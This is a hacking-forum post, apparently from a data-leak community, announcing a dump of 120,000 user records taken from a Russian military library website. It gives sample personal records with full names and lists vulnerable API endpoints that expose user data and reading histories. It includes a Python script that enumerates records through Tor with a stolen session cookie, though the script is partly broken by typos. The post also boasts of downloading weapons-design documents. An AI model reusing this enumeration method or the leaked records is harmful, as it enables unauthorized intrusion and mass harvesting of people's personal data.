04-09-25, 11:22 AM
(10-06-23, 02:00 AM)PocExploiter Wrote:Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
Download Records:
Vulnerabilities:
- Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.
[b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option.
Code:{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}
{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}
Now Exposed Admin:
https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military
[b]CODE EXPLOIT:[/b]
PHP Code:#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
for i in range(100642):
headers = { 'User-Agent': UserAgent(browsers=['edge', 'firefox']).random }
time.sleep(1)
with Controller.from_port(port = 9051) as c:
c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
c.signal(Signal.NEWNYM)
url = "'https://biblio2.mil.ru/api/reader/1" + str(i) + "'"
comando = "curl --proxy socks5://127.0.0.1:9050 " + url + " --cokkie='" + sys.argv[1] + "'")
print(comando)
print("\nIndice: " + str(i) + "\n")
os.system(comando)
- The vulnerability allows viewing details of system users.
- Other identical vulnerabilities have been verified
- The User API Actions with administrator privileges were also identified.
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.![[Image: books.jpg]](https://zer0daysellers.com/shop/wp-content/uploads/2023/04/books.jpg)
![[Image: 1200px-Middle_emblem_of_the_Ministry_of_...29.svg.png]](https://upload.wikimedia.org/wikipedia/commons/thumb/2/25/Middle_emblem_of_the_Ministry_of_Defence_of_the_Russian_Federation_%2821.07.2003-present%29.svg/1200px-Middle_emblem_of_the_Ministry_of_Defence_of_the_Russian_Federation_%2821.07.2003-present%29.svg.png)
![[Image: BANK-1024x716.jpg]](https://zer0daysellers.com/shop/wp-content/uploads/2023/04/BANK-1024x716.jpg)
![[Image: Screenshot_43.jpg]](https://zer0daysellers.com/shop/wp-content/uploads/2023/04/Screenshot_43.jpg)
